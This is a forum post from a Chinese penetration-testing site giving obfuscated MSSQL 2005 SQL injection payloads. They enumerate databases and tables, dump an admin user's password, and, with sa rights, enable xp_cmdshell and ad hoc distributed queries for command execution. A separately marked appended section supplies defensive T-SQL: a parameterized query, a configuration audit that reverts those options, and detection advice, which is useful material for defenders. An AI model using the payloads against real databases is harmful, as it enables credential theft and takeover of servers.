中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: MSSQL 2005 injection statements

Author: admin    Time: 2012-9-13 17:19

CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

Table-enumeration statement; the somedb part is the database whose tables you want to list, and the number 1 (shown in red in the original) is incremented by one each time.

CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

Column-dump statement: dumps the password field of the row in table admin where user='icerover'.

CODE:
/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

MSSQL 2005 does not enable xp_cmdshell by default, and openrowset cannot be used either.
If you have sa privileges, you can enable them like this.
Enable openrowset

CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

Enable xp_cmdshell

CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok, over~~ good night




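As an added defensive example (not from the original post or its author), the following T-SQL shows the two countermeasures to what the post describes: the admin lookup from the third payload rewritten with sp_executesql parameters, so that a value such as icerover' followed by an injected subquery is compared as data instead of being spliced into the WHERE clause, and an audit of sys.configurations that reverts the xp_cmdshell and Ad Hoc Distributed Queries options the last two code blocks turn on. The names [somedb]..[admin], [user] and [password] are taken from the post; @login and the sample value are constructed and assumed.

```sql
-- Added example (not from the original post): defender-side T-SQL for SQL Server 2005 and later.

-- 1. Parameterised lookup. The post's payload works because the user value is
--    concatenated into the query text. With sp_executesql the value is bound as
--    a parameter, so quotes, comments or subqueries in it stay inside the string
--    and never reach the parser.
DECLARE @login nvarchar(100);
SET @login = N'icerover';        -- constructed sample input; @login is an assumed variable name
EXEC sp_executesql
    N'SELECT [password] FROM [somedb]..[admin] WHERE [user] = @u',
    N'@u nvarchar(100)',
    @u = @login;

-- 2. Audit the options the post enables. value_in_use = 1 means the option is active.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN (N'show advanced options', N'Ad Hoc Distributed Queries', N'xp_cmdshell');

-- 3. Revert them. 'show advanced options' has to be on while the other two are
--    changed, then is switched off again so they stay hidden from sp_configure.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

The SELECT doubles as a detection check: the post's sequence starts by flipping 'show advanced options', so a server where xp_cmdshell or Ad Hoc Distributed Queries report value_in_use = 1 without a documented reason is worth investigating, and the sp_configure calls themselves can be captured by SQL Server's default trace or an audit on the configuration-change event.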
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2